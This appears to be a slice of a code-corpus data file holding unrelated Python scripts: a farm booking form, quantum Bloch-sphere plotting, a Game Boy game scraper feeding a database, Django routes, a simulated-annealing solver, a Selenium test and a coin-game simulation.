\"\\n\" + \"\\n\")\r\n \r\n\r\n gineauPigs = input(\"Would you like to see the Gineau Pigs? :\" + \"\\n\" + \"Yes/No?: \")\r\n f.write(\"Gineau Pigs: \" + gineauPigs + \"\\n\")\r\n\r\n \r\n pony = input(\"Would you like to see the Pony's? :\" + \"\\n\" + \"Yes/No?: \")\r\n f.write(\"Pony Grooming: \" + pony + \"\\n\")\r\n\r\n \r\n cow = input(\"Would you like to see the Cow? :\" + \"\\n\" + \"Yes/No?: \")\r\n f.write(\"Cow Milking: \" + cow + \"\\n\")\r\n\r\n \r\n miniBeasts = input(\"Would you like to see the Mini Beasts? :\" + \"\\n\" + \"Yes/No?: \")\r\n f.write(\"Mini beasts: \" + miniBeasts + \"\\n\")\r\n\r\n \r\n tractor = input(\"Would you like to ride on the tractor? :\" + \"\\n\" + \"Yes/No?: \")\r\n f.write(\"Tractor Ride: \" + tractor + \"\\n\" + \"\\n\")\r\n \r\n\r\n tourGuide = input(\"Would you like a tour guide for the day? :\" + \"\\n\" + \"Yes/No?\")\r\n f.write(\"Tour Guide: \" + tourGuide + \"\\n\" + \"\\n\")\r\n\r\n \r\n f.close()\r\n exit()\r\n\r\n\r\n#VALIDATION\r\n#VALIDATION\r\n#VALIDATION\r\n\r\ndef dateValidation():\r\n try:\r\n valid_day = time.strptime(day, '%d/%m/%Y')\r\n return valid_day\r\n except ValueError:\r\n print('Invalid date!')\r\n day = input(\"Enter date of arrival. (DD/MM/YYYY)\")\r\n dateValidation(day)\r\n\r\ndef timeValidation():\r\n try:\r\n valid_timea = time.strptime(timea, '%H:%M')\r\n except ValueError:\r\n print('Invalid time!')\r\n\r\ndef isValidEmail(email):\r\n if len(email) > 7:\r\n if re.match(\"^.+@([?)[a-zA-Z0-9-.]+.([a-zA-Z]{2,3}|[0-9]{1,3})(]?)$\", email) != None:\r\n return True\r\n return False\r\n\r\n\r\n\r\n \r\n#main program\r\n#main program\r\n#main program\r\n \r\n\r\nwelcome()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":5326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"211795732","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport pyle\n\ndef plotbar3d(matrix):\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n\n xwidth = 0.6\n ywidth = 0.6\n xsize, ysize = np.shape(matrix)\n x, y = np.meshgrid(range(xsize), range(ysize), indexing='ij')\n x = x.flatten() - xwidth/2\n y = y.flatten() - ywidth/2\n z = np.zeros(xsize*ysize)\n dx = xwidth*np.ones_like(z)\n dy = ywidth*np.ones_like(z)\n dz = matrix.flatten()\n\n ax.bar3d(x, y, z, dx, dy, dz, color='r')\n plt.xlabel('Row')\n plt.ylabel('Column')\n\ndef rho2rhoI(rhosIn, tseq, f10, f21):\n w10 = 2*np.pi*f10\n w21 = 2*np.pi*f21\n def U(t):\n return np.array([[1, 0, 0],\n [0, np.exp(-1j*w10*t), 0],\n [0, 0, np.exp(-2j*w21*t)]])\n return np.array([np.dot(np.dot(U(t).conj().T, rhosIn[i]), U(t))\n for i, t in enumerate(tseq)])\n\ndef Uframetransfer(theta, phi):\n return np.array([[np.cos(theta/2), -np.sin(theta/2)],\n [np.sin(theta/2)*np.exp(1j*phi), np.cos(theta/2)*np.exp(1j*phi)]])\n\ndef rho2newframe(rho, U):\n return np.dot(np.dot(U.conj().T, rho), U)\n\ndef rho2bloch(rho):\n \"\"\"Turn the density matrix to bloch vectors.\"\"\"\n sigmas = [pyle.tomo.sigmaX, pyle.tomo.sigmaY, pyle.tomo.sigmaZ]\n return np.array([np.trace(np.dot(rho, sigma)) for sigma in sigmas])\n\ndef xyzprojections(rhosIn):\n if rhosIn[0].shape[0]==3:\n rhos = np.array([rho[:-1,:-1] for rho in rhosIn])\n else:\n rhos = rhosIn[:]\n blochs = np.real(np.array([rho2bloch(rho) for rho in rhos]))\n # the imaginary parts are typically of magnitude of ~1e-16\n return blochs[:,0], blochs[:,1], blochs[:,2]\n\ndef rhos2thetaphi(rhosIn):\n \"\"\"Turn the density matrix to bloch parameters.\"\"\"\n x, y, z = xyzprojections(rhosIn)\n mag = np.sqrt(x**2 + y**2 + z**2)\n phi = np.angle(x + 1j*y)\n theta = np.arccos(z/mag)\n return theta, phi\n\ndef thetaphi2rho(theta, phi):\n rho = np.array([[(1.0+np.cos(theta))/2, np.sin(theta)/2*np.exp(-1j*phi)],\n [np.sin(theta)/2*np.exp(1j*phi), (1.0-np.cos(theta))/2]])\n return rho\n\ndef thetaphi2psi(theta, phi):\n return np.array([np.cos(theta/2), np.sin(theta/2)*np.exp(1j*phi)])\n\ndef plotTrajectory(rhosIn, bloch=True, labels=True, scatter=False):\n #If these are three level qubits, get rid of the |2> contribution\n if rhosIn[0].shape[0]==3:\n rhos = np.array([rho[:-1,:-1] for rho in rhosIn])\n else:\n rhos = rhosIn[:]\n blochs = np.real(np.array([rho2bloch(rho) for rho in rhos]))\n\n #draw a bloch sphere\n fig = plt.figure(figsize=(12,12))\n ax = Axes3D(fig)\n ax.set_xlim([-1.0, 1.0])\n ax.set_ylim([-1.0, 1.0])\n ax.set_zlim([-1.0, 1.0])\n ax.set_aspect('equal')\n if bloch:\n u = np.linspace(0, 2 * np.pi, 100)\n v = np.linspace(0, np.pi, 100)\n\n x = np.outer(np.cos(u), np.sin(v))\n y = np.outer(np.sin(u), np.sin(v))\n z = np.outer(np.ones(np.size(u)), np.cos(v))\n ax.plot_surface(x, y, z, rstride=8, cstride=8, color ='0.8', alpha=0.1)\n #, cmap = cm.PuBu) #, alpha = 1.0)\n\n #Axis label\n if labels:\n ax.text(0, 0, 1, '|0>')\n ax.text(0, 0, -1, '|1>')\n ax.text(1, 0, 0, '|0> + |1>')\n ax.text(-1, 0, 0, '|0> - |1>')\n ax.text(0, 1, 0, '|0> + i|1>')\n ax.text(0, -1, 0, '|0> - i|1>')\n\n #Axis\n ax.plot([-1.2,1.2],[0,0],[0,0], color = '#e1a95f', linewidth=2) #X\n ax.plot([0,0],[-1.2,1.2],[0,0], color = '#228b22', linewidth=2) #Y\n ax.plot([0,0],[0,0],[-1.2,0], '--', color = '#ff0000', linewidth=2) #Z-\n ax.plot([0,0],[0,0],[0,+1.2], '--', color = '#00bfff', linewidth=2) #Z+\n # ax.set_aspect('equal')\n # draw the trajectory\n if not scatter:\n ax.plot(blochs[:,0],blochs[:,1],blochs[:,2], markersize=10)\n else:\n ax.scatter(blochs[:,0],blochs[:,1],blochs[:,2], c='r', marker='o', s=10)\n\ndef drawBlochSphere(bloch = True, labels = True):\n fig = plt.figure(figsize=(7,7))\n ax = Axes3D(fig)\n #draw a bloch sphere\n if bloch:\n u = np.linspace(0, 2 * np.pi, 100)\n v = np.linspace(0, np.pi, 100)\n\n x = np.outer(np.cos(u), np.sin(v))\n y = np.outer(np.sin(u), np.sin(v))\n z = np.outer(np.ones(np.size(u)), np.cos(v))\n ax.plot_surface(x, y, z, rstride=8, cstride=8, color='0.8', alpha=0.1)\n #, cmap = cm.PuBu) #, alpha = 1.0)\n ax.set_aspect('equal')\n\n #Axis label\n if labels:\n ax.text(0, 0, 1, '|0>')\n ax.text(0, 0, -1, '|1>')\n ax.text(1, 0, 0, '|0> + |1>')\n ax.text(-1, 0, 0, '|0> - |1>')\n ax.text(0, 1, 0, '|0> + i|1>')\n ax.text(0, -1, 0, '|0> - i|1>')\n\n #Axis\n ax.plot([-1.2,1.2],[0,0],[0,0], color = '0.1', linewidth=2)\n ax.plot([0,0],[-1.2,1.2],[0,0], color = '0.1', linewidth=2)\n ax.plot([0,0],[0,0],[-1.2,1.2], color = '0.1', linewidth=2)\n ax.set_aspect('equal')\n\n return fig, ax\n\ndef plotctrlsequence(T, system):\n plt.figure(figsize=(7,5))\n uw = np.array([qubit.uw(T) for qubit in system.qubits]).T\n df = np.array([qubit.df(T) for qubit in system.qubits]).T\n rng_uw = max(np.amax(abs(uw)), 0.01)\n rng_df = max(np.amax(abs(df)), 0.01)\n for i in range(system.m):\n plt.subplot(system.m*2, 1, 2*i+1)\n plt.plot(T, uw[:,i].real, T, uw[:,i].imag)\n plt.ylabel('uw-xy')\n plt.ylim(-rng_uw*1.1, rng_uw*1.1)\n plt.legend(('X', 'Y'))\n\n plt.subplot(system.m*2, 1, 2*i+2)\n plt.plot(T, df[:,i])\n plt.ylabel('uw-detuning(q%i)' %(i+1))\n plt.ylim(-rng_df*1.1, rng_df*1.1)\n plt.xlabel('time [ns]')\n\n\ndef fixphase(phase):\n fix = 0\n for i in range(len(phase)-1):\n if abs(phase[i+1]+fix-phase[i])>0.8*np.pi:\n fix += -np.sign(phase[i+1]-phase[i])*2*np.pi\n else:\n pass\n phase[i+1] = phase[i+1] + fix\n return phase\n\ndef piLocator(xLocator=np.pi/4, yLocator=np.pi/4):\n ax = plt.subplot(111)\n xmajorLocator = plt.MultipleLocator(xLocator)\n xmajorFormatter = plt.FormatStrFormatter('%2.1f'+r'$\\pi$')\n ymajorLocator = plt.MultipleLocator(yLocator)\n ymajorFormatter = plt.FormatStrFormatter('%2.1f'+r'$\\pi$')\n ax.xaxis.set_major_locator(xmajorLocator)\n ax.xaxis.set_major_formatter(xmajorFormatter)\n ax.yaxis.set_major_locator(ymajorLocator)\n ax.yaxis.set_major_formatter(ymajorFormatter)\n ax.xaxis.grid(True, which='major')\n ax.yaxis.grid(True, which='major')\n return ax\n","sub_path":"xlpyle/simulation/drawtools.py","file_name":"drawtools.py","file_ext":"py","file_size_in_byte":6555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"251402980","text":"import pandas as pd\nimport re\nimport db_utils\nimport scrape_utils\nfrom fuzzywuzzy import fuzz\nimport time\n#WHEN PORTING THIS CODE PAY ATTENTION TO GB_ID AND TO THE GAMEFAQS SCRAPING TO HCNAGE TO THE CORRECT CONSOLE\n#ALSO IN RESOLVE CONFLICTS WHEN APPENDING CONSOLE NAME, CCHNAGE TO CORRECT APPENDAGE\ndef scrapeGBGames():\n \"\"\"Scrapes GB games info from wikipedia lists\"\"\"\n global GB_ID\n global listpro\n listpro = scrape_utils.findSuitableProxy()\n #listpro=set(['193.178.246.248:8080','27.98.206.187:3128'])\n if(len(listpro)==0):\n print(listpro) \n return\n GB_ID=5\n url = r'https://en.wikipedia.org/wiki/List_of_Game_Boy_games'\n tables = pd.read_html(url) # Returns list of all tables on page\n games = tables[0]\n titles = games[games.columns[0]].tolist()\n developers = games[games.columns[1]].tolist() \n publishers = games[games.columns[2]].tolist()\n dateJP = games[games.columns[4]].tolist()\n dateUS = games[games.columns[6]].tolist() \n dateEU = games[games.columns[8]].tolist()\n conflicting_indexes=[]\n counter=20\n for count in range(len(titles)-1,len(titles)):\n if(type(dateJP[count]) is float and type(dateEU[count]) is float and type(dateUS[count]) is float):\n continue\n counter=counter-1\n if(counter==0):\n listpro = scrape_utils.findSuitableProxy()\n while(len(listpro)==0):\n print(\"trying to extract proxylist\")\n time.sleep(5)\n listpro = scrape_utils.findSuitableProxy()\n counter=20\n if(len(conflicting_indexes)>0):\n print(\"CONFLICTING INDEXES ARE:\")\n print(conflicting_indexes)\n if(count==len(titles)-1):\n resolveConflicts(conflicting_indexes,titles,developers,publishers,dateJP,dateEU,dateUS)\n return\n if(titles[count]==''):\n return \n print(\"doing iteration \"+str(count)+ \" for title \"+titles[count])\n titleClean=re.sub('(?<=[a-z]|[1-9])(JP|PAL|NA)','',titles[count])\n possibleTitles=cleanupTitles(re.split('(?<=[a-z]|[1-9])([A-Z])|JP\\/EU|NA|EU|JP|EU\\/AU|\\/|NA\\/PAL',titleClean))\n #print(possibleTitles,dateJP[count],dateUS[count],dateEU[count],developers[count],publishers[count])\n newGame=True\n gameDetails = []\n gameDetails.append(GB_ID)\n conflicts=db_utils.gameExistsMultiple(possibleTitles[0])\n if(conflicts!=-1 and len(conflicts)>0):\n conflicting_index=count\n conflicting_indexes.append(conflicting_index)\n continue\n else:\n newGameID=db_utils.insertGame(possibleTitles[0])\n if(type(newGameID) is list):\n gameDetails.append(newGameID[0])\n else:\n gameDetails.append(newGameID)\n \n if(len(possibleTitles)==2 and possibleTitles[1]!=\"\"):\n db_utils.customQuery('UPDATE game SET alt_title=\"'+possibleTitles[1]+'\" WHERE id='+str(gameDetails[1])+' AND alt_title is null')\n if(len(possibleTitles)==3 and possibleTitles[2]!=\"\"):\n db_utils.customQuery('UPDATE game SET alt_title2=\"'+possibleTitles[2]+'\" WHERE id='+str(gameDetails[1])+' AND alt_title2 is null')\n if(len(possibleTitles)==4 and possibleTitles[3]!=\"\"):\n db_utils.customQuery('UPDATE game SET alt_title2=\"'+possibleTitles[3]+'\" WHERE id='+str(gameDetails[1])+' AND alt_title2 is null')\n #depending on regions\n if(type(dateUS[count]) is float):\n gameDetails.append(\"Unreleased\")\n else:\n gameDetails.append(dateUS[count])\n if(type(dateEU[count]) is float):\n gameDetails.append(\"Unreleased\")\n else:\n gameDetails.append(dateEU[count])\n if(type(dateJP[count]) is float):\n gameDetails.append(\"Unreleased\")\n else:\n gameDetails.append(dateJP[count])\n gameDetails.append(\"\") #dateGEN\n db_utils.insertGamePlatform(gameDetails)\n if(newGame):\n if(type(publishers[count]) is not float):\n cleanPublishers = re.sub('\\[.{0,3}\\]','',publishers[count])\n publishersSplit = re.split('(?<=[a-z])[A-Z].*|JP\\/EU|NA|EU|JP|EU\\/AU|\\/|PAL|NA\\/PAL|JP\\/PAL|NA\\/JP|NA\\/EU',cleanPublishers)\n pubIDs = db_utils.insertPublishers(publishersSplit)\n db_utils.insertGamePublishers(gameDetails[1],pubIDs)\n if(type(developers[count]) is not float and developers[count]!='???'):\n devIDs = db_utils.insertDevelopers(re.split('(?<=[a-z]|[1-9])[A-Z]',developers[count])) \n db_utils.insertGameDevelopers(gameDetails[1],devIDs)\n infobox = scrape_utils.wikipediaInfoboxScraping(possibleTitles[0])\n if(infobox is not None):\n db_utils.saveInfoboxData(infobox,gameDetails[1],platformID=GB_ID)\n if('boxart' in infobox):\n gamefaqsScraping(possibleTitles[0],gameDetails[1],False,newGame)\n else:\n gamefaqsScraping(possibleTitles[0],gameDetails[1],True,newGame)\n else:\n gamefaqsScraping(possibleTitles[0],gameDetails[1],True,newGame)\n\ndef validDecision(dec):\n if dec==\"new\" or dec==\"newapp\" or dec==\"newtitle\" or str.isdigit(dec):\n return True\n return False\n\ndef resolveConflicts(conflicting_indexes,titles,developers,publishers,dateJP,dateEU,dateUS):\n #in database fix titles like final fantasy legends\n #delete info games on gb\n #check title with (GB)\n GB_ID=5\n print(\"conflicts nr\",len(conflicting_indexes))\n decisions=dict()\n newTitles=dict()\n for i in conflicting_indexes:\n if(i in decisions):\n continue\n titleClean=re.sub('(?<=[a-z]|[1-9])(JP|PAL|NA)','',titles[i])\n possibleTitles=cleanupTitles(re.split('(?<=[a-z]|[1-9])([A-Z])|JP\\/EU|NA|EU|JP|EU\\/AU|\\/|NA\\/PAL',titleClean))\n conflicts=db_utils.gameExistsMultiple(possibleTitles[0])\n print(\"DECISION \"+str(i)+ \" for title \"+titles[i])\n print(\"Considering \"+possibleTitles[0])\n for index in range(0,len(conflicts)):\n print(\"Enter \"+ str(index)+\" to merge with: \"+conflicts[index]['title']+\"(\"+str(conflicts[index]['similarity'])+\")\"+\" - \"+str(conflicts[index]['platforms']))\n decisions[i] = input(\"Enter new or newapp(newtitle to input custom title) or new to create new entry or NUMERICAL index to merge with existing: \")\n while(not validDecision(decisions[i])):\n decisions[i] = input(\"Invalid input, try again(new, newapp or index of game to merge): \")\n if(decisions[i]==\"newtitle\"):\n newTitles[i] = input(\"Input new desired game title:\")\n decisions[i]=\"new\"\n print(decisions)\n print(newTitles)\n\n counter=20\n for count in conflicting_indexes:\n if(count not in decisions):\n continue\n counter=counter-1\n if(counter==0):\n listpro = scrape_utils.findSuitableProxy()\n while(len(listpro)==0):\n print(\"trying to extract proxylist\")\n time.sleep(5)\n listpro = scrape_utils.findSuitableProxy()\n counter=20\n try:\n print(\"doing iteration \"+str(count)+ \" for title \"+titles[count])\n titleClean=re.sub('(?<=[a-z]|[1-9])(JP|PAL|NA)','',titles[count])\n possibleTitles=cleanupTitles(re.split('(?<=[a-z]|[1-9])([A-Z])|JP\\/EU|NA|EU|JP|EU\\/AU|\\/|NA\\/PAL',titleClean))\n conflicts=db_utils.gameExistsMultiple(possibleTitles[0])\n if(count in newTitles):\n possibleTitles[0]=newTitles[count]\n #print(possibleTitles,dateJP[count],dateUS[count],dateEU[count],developers[count],publishers[count])\n newGame=True\n gameDetails = []\n gameDetails.append(GB_ID)\n decision=decisions[count]\n if(str(decision)==\"new\" or str(decision)==\"newapp\"):\n print(\"Creating new game out of conflict\")\n if(str(decision)==\"newapp\"):\n newGameID=db_utils.insertGame(possibleTitles[0]+ \" (GB)\")\n else:\n newGameID=db_utils.insertGame(possibleTitles[0])\n if(type(newGameID) is list):\n gameDetails.append(newGameID[0])\n else:\n gameDetails.append(newGameID)\n elif(str.isdigit(decision)):\n print(\"Merging with \"+str(conflicts[int(decision)]))\n if r')' in conflicts[int(decision)]['title']:\n newTitle=re.sub('\\)','/GB)',conflicts[int(decision)]['title'])\n db_utils.customQuery('UPDATE game SET title=\"'+newTitle+'\" WHERE game.id='+str(conflicts[int(decision)]['gameid']))\n gameDetails.append(conflicts[int(decision)]['gameid'])\n newGame=False\n if(len(possibleTitles)==2 and possibleTitles[1]!=\"\"):\n db_utils.customQuery('UPDATE game SET alt_title=\"'+possibleTitles[1]+'\" WHERE id='+str(gameDetails[1])+' AND alt_title is null')\n if(len(possibleTitles)==3 and possibleTitles[2]!=\"\"):\n db_utils.customQuery('UPDATE game SET alt_title2=\"'+possibleTitles[2]+'\" WHERE id='+str(gameDetails[1])+' AND alt_title2 is null')\n if(len(possibleTitles)==4 and possibleTitles[3]!=\"\"):\n db_utils.customQuery('UPDATE game SET alt_title2=\"'+possibleTitles[3]+'\" WHERE id='+str(gameDetails[1])+' AND alt_title2 is null')\n #depending on regions\n if(type(dateUS[count]) is float):\n gameDetails.append(\"Unreleased\")\n else:\n gameDetails.append(dateUS[count])\n if(type(dateEU[count]) is float):\n gameDetails.append(\"Unreleased\")\n else:\n gameDetails.append(dateEU[count])\n if(type(dateJP[count]) is float):\n gameDetails.append(\"Unreleased\")\n else:\n gameDetails.append(dateJP[count])\n gameDetails.append(\"\") #dateGEN\n db_utils.insertGamePlatform(gameDetails)\n except Exception as e:\n print(str(e))\n return\n try:\n if(newGame):\n if(type(publishers[count]) is not float):\n cleanPublishers = re.sub('\\[.{0,3}\\]','',publishers[count])\n publishersSplit = re.split('(?<=[a-z])[A-Z].*|JP\\/EU|NA|EU|JP|EU\\/AU|\\/|PAL|NA\\/PAL|JP\\/PAL|NA\\/JP|NA\\/EU',cleanPublishers)\n pubIDs = db_utils.insertPublishers(publishersSplit)\n db_utils.insertGamePublishers(gameDetails[1],pubIDs)\n if(type(developers[count]) is not float and developers[count]!='???'):\n devIDs = db_utils.insertDevelopers(re.split('(?<=[a-z]|[1-9])[A-Z]',developers[count])) \n db_utils.insertGameDevelopers(gameDetails[1],devIDs)\n infobox = scrape_utils.wikipediaInfoboxScraping(possibleTitles[0])\n if(infobox is not None):\n db_utils.saveInfoboxData(infobox,gameDetails[1],platformID=GB_ID)\n if('boxart' in infobox):\n gamefaqsScraping(possibleTitles[0],gameDetails[1],False,newGame)\n else:\n gamefaqsScraping(possibleTitles[0],gameDetails[1],True,newGame)\n else:\n gamefaqsScraping(possibleTitles[0],gameDetails[1],True,newGame)\n except Exception as e:\n print(str(e))\n continue\n\ndef cleanupTitles(possibleTitles):\n finalTitles = []\n for titlecount in range(0,len(possibleTitles)):\n if(possibleTitles[titlecount] is None):\n continue\n if(len(possibleTitles[titlecount])==1 and titlecount[0-9]+)/$', map_detail),\n\n url(r'^maps/(?P[0-9]+)/vertexs/$', vertex_list),\n url(r'^maps/(?P[0-9]+)/vertexs/(?P[0-9]+)/$', vertex_detail),\n\n url(r'^maps/(?P[0-9]+)/edges/$', edge_list),\n url(r'^maps/(?P[0-9]+)/edges/(?P[0-9]+)/$', edge_detail),\n]\n\n","sub_path":"remac_portal/urls/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"604931260","text":"import matplotlib.pyplot as plt\nimport math\nimport random\n\n# TODO ADD COMENTARIOS\n\n\nclass SA:\n def __init__(self, matrix, T=-1, alpha=-1, stopping_T=-1, stopping_iter=-1):\n self.matrix = matrix\n self.N = len(matrix)\n self.T = math.sqrt(self.N) if T == -1 else T\n self.alpha = 0.995 if alpha == -1 else alpha\n self.stopping_temperature = 0.00000001 if stopping_T == -1 else stopping_T\n self.stopping_iter = 100000 if stopping_iter == -1 else stopping_iter\n self.iteration = 1\n\n self.nodes = [i for i in range(self.N)]\n\n self.cur_solution = self.initial_solution()\n self.initial_solution_value = self.cur_solution\n self.best_solution = list(self.cur_solution)\n\n self.cur_fitness = self.fitness(self.cur_solution)\n self.initial_fitness = self.cur_fitness\n self.best_fitness = self.cur_fitness\n\n self.fitness_list = [self.cur_fitness]\n\n def initial_solution(self):\n cur_node = random.choice(self.nodes)\n solution = [cur_node]\n free_list = list(self.nodes)\n free_list.remove(cur_node)\n while free_list:\n closest_dist = min([self.matrix[cur_node][j] for j in free_list])\n idx_rep = [i for i, item in enumerate(self.matrix[cur_node]) if item == closest_dist]\n for i in idx_rep:\n cur_node = i\n if cur_node in free_list:\n free_list.remove(cur_node)\n break\n solution.append(cur_node)\n\n return solution\n\n def fitness(self, solution):\n return round(sum([self.matrix[solution[i - 1]][solution[i]] for i in range(1, self.N)]) +\n self.matrix[solution[0]][solution[self.N - 1]], 4)\n\n def p_accept(self, candidate_fitness):\n return math.exp(-abs(candidate_fitness - self.cur_fitness) / self.T)\n\n def accept(self, candidate):\n candidate_fitness = self.fitness(candidate)\n if candidate_fitness < self.cur_fitness:\n self.cur_fitness = candidate_fitness\n self.cur_solution = candidate\n if candidate_fitness < self.best_fitness:\n self.best_fitness = candidate_fitness\n self.best_solution = candidate\n else:\n if random.random() < self.p_accept(candidate_fitness):\n self.cur_fitness = candidate_fitness\n self.cur_solution = candidate\n\n def plot_learning(self):\n plt.plot([i for i in range(len(self.fitness_list))], self.fitness_list)\n plt.ylabel('Fitness')\n plt.xlabel('Iteration')\n plt.show()\n\n def sa(self, file):\n while self.T >= self.stopping_temperature and self.iteration < self.stopping_iter:\n candidate = list(self.cur_solution)\n j = random.randint(2, self.N - 1)\n i = random.randint(0, self.N - j)\n candidate[i:(i + j)] = reversed(candidate[i:(i + j)])\n self.accept(candidate)\n self.T *= self.alpha\n self.iteration += 1\n self.fitness_list.append(self.cur_fitness)\n\n file.write('Initial Solution: {}\\n'.format(self.initial_solution_value))\n file.write('Best solution: {}\\n'.format(self.best_solution))\n file.write('Initial fitness: {}\\n'.format(self.initial_fitness))\n file.write('Best fitness obtained: {}\\n'.format(self.best_fitness))\n\n# BACKUP KKKKKKK\n\"\"\"cur_node = random.choice(self.nodes)\n # print(\"No atual: {}\".format(cur_node))\n # print(\"Dimensao da matriz: {}\".format(len(self.matrix)))\n solution = [cur_node]\n free_list = list(self.nodes)\n free_list.remove(cur_node)\n # print(free_list)\n\n while free_list:\n min_col, min_row, min_idx = 9999, 9999, 9999\n valores = []\n for j in free_list:\n if j < cur_node:\n valores.append(self.matrix[cur_node-1][j])\n if(min_row > self.matrix[cur_node-1][j]):\n min_row = self.matrix[cur_node-1][j]\n for i in range(cur_node, len(self.matrix)):\n valores.append(self.matrix[i][cur_node-1])\n if (min_col > self.matrix[i][cur_node-1]) and (i in free_list):\n min_col = self.matrix[i][cur_node-1]\n min_idx = i\n # print(\"valores: {}\".format(valores))\n if min_row < min_col:\n closest_dist = min_row\n cur_node = self.matrix[cur_node-1].index(closest_dist)\n else:\n closest_dist = min_col\n cur_node = min_idx\n # closest_dist = min(min([self.matrix[cur_node][j] for j in free_list[0:cur_node]]) and\n # min([self.matrix[i][cur_node] for i in range(cur_node, len(self.matrix))]))\n # print(\"Menor Distancia: {}\".format(closest_dist))\n # cur_node = self.matrix[cur_node].index(closest_dist)\n # print(\"No atual: {}\".format(cur_node))\n free_list.remove(cur_node)\n # print(free_list)\n solution.append(cur_node)\n # print(\"Solucao\")\n # print(solution)\n\n # print(\"Solucao Final\")\n # print(solution)\n return solution\"\"\"\n\n\"\"\" def initial_solution(self):\n cur_node = random.choice(self.nodes)\n solution = [cur_node]\n free_list = list(self.nodes)\n free_list.remove(cur_node)\n # print(\"Solucao Inicial -> {}\".format(solution))\n # print(\"Nos nao Visitados -> {}\".format(free_list))\n while free_list:\n closest_dist = min([self.matrix[cur_node][j] for j in free_list])\n # closest_dist = 9999\n # print(\"No atual -> {}\".format(cur_node))\n # print(self.matrix[cur_node])\n # for j in free_list:\n # closest_dist = min(closest_dist, self.matrix[cur_node][j])\n # cur_node = self.matrix[cur_node].index(closest_dist)\n # print(\"Menor Distancia -> {}\".format(closest_dist))\n idx_rep = [i for i, item in enumerate(self.matrix[cur_node]) if item == closest_dist]\n # print(\"Colunas Repetidas -> {}\".format(idx_rep))\n # print(\"Nos nao Visitados -> {}\".format(free_list))\n # print(\"Nº de nos nao Visitados -> {}\".format(len(free_list)))\n for i in idx_rep:\n # print(i)\n cur_node = i\n # print(\"{} esta na lista: {}\".format(cur_node, cur_node in free_list))\n if cur_node in free_list:\n free_list.remove(cur_node)\n break\n solution.append(cur_node)\n\n return solution\"\"\"","sub_path":"SA.py","file_name":"SA.py","file_ext":"py","file_size_in_byte":6731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"451426822","text":"# instantiate class only once\n# eg: load db data\n# factory class\n\nclass Database:\n _instance = None\n\n def __new__(cls, *args, **kwargs):\n if not cls._instance:\n cls._instance = super().__new__(cls)\n return cls._instance\n\n # not right - called multiple times\n def __init__(self):\n print(\"loading db\")\n\n\nif __name__ == \"__main__\":\n d1 = Database()\n d2 = Database()\n print(d1 == d2)\n","sub_path":"PYTHON/PYTHON_DESIGN_PATTERNS/p018_singleton_allocator.py","file_name":"p018_singleton_allocator.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"154165528","text":"import unittest\nfrom selenium import webdriver\nfrom pyunitreport import HTMLTestRunner\n\n\nclass NavigationTest(unittest.TestCase):\n\n def setUp(self):\n self.driver = webdriver.Chrome(executable_path=\"chromedriver.exe\")\n driver = self.driver\n driver.implicitly_wait(10)\n driver.maximize_window()\n driver.get(\"http://demo-store.seleniumacademy.com\")\n\n\n def test_browser_navigation(self):\n driver = self.driver\n\n search_field = driver.find_element_by_name(\"q\")\n search_field.clear()\n search_field.send_keys(\"platzi\")\n search_field.submit()\n\n driver.back()\n driver.forward()\n driver.refresh()\n \n def tearDown(self):\n self.driver.quit()\n\n\nif __name__ == \"__main__\":\n unittest.main( verbosity= 2, testRunner= HTMLTestRunner( output = \"reportes\", report_name=\"automatic-Navigation\"))","sub_path":"automatic_navigation.py","file_name":"automatic_navigation.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"343600072","text":"import numpy as np\n\n\nclass Game(object):\n def __init__(self, id, prob_head):\n self._id = id\n self._rnd = np.random\n self._rnd.seed(id)\n self._probHead = prob_head # probability of flipping a head\n self._countWins = 0 # number of wins, set to 0 to begin\n\n def simulate(self, n_of_flips):\n\n count_tails = 0 # number of consecutive tails so far, set to 0 to begin\n\n # flip the coin 20 times\n for i in range(n_of_flips):\n\n # in the case of flipping a heads\n if self._rnd.random_sample() < self._probHead:\n if count_tails >= 2: # if the series is ..., T, T, H\n self._countWins += 1 # increase the number of wins by 1\n count_tails = 0 # the tails counter needs to be reset to 0 because a heads was flipped\n\n # in the case of flipping a tails\n else:\n count_tails += 1 # increase tails count by one\n\n def get_reward(self):\n # calculate the reward from playing a single game\n return 100*self._countWins - 250\n\n\nclass SetOfGames:\n def __init__(self, prob_head, n_games):\n self._gameRewards = [] # create an empty list where rewards will be stored\n self._n_games = n_games\n\n # simulate the games\n for n in range(n_games):\n # create a new game\n game = Game(id=n, prob_head=prob_head)\n # simulate the game with 20 flips\n game.simulate(20)\n # store the reward\n self._gameRewards.append(game.get_reward())\n\n def get_ave_reward(self):\n \"\"\" returns the average reward from all games\"\"\"\n return sum(self._gameRewards) / len(self._gameRewards)\n\n def get_game_rewards(self):\n return self._gameRewards\n\n def get_prob_losing(self):\n count = 0 # count the number of times reward was negative\n for reward in self._gameRewards:\n if reward < 0:\n count += 1\n\n prob_losing = count / self._n_games\n\n return prob_losing\n\n\n","sub_path":"HW5_P1P2.py","file_name":"HW5_P1P2.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"637886785","text":"import requests\nimport pdb\nimport time\nfrom pymongo import MongoClient, Connection\nclient = MongoClient('localhost', 27017) # change this to connect to different mongo client\ndb = client.local\nmatchDB = db.matchDB #replace this with your MongoDB collection name\ncurrentDate = '1427981400'\n\nfor a in matchDB.find({}):\n\tif (a['beginDate']>currentDate):\n\t\tcurrentDate = a['beginDate']\n#currentDate = '1428669000'\nargs = {'beginDate':currentDate, 'api_key': ''}\n\n#r = 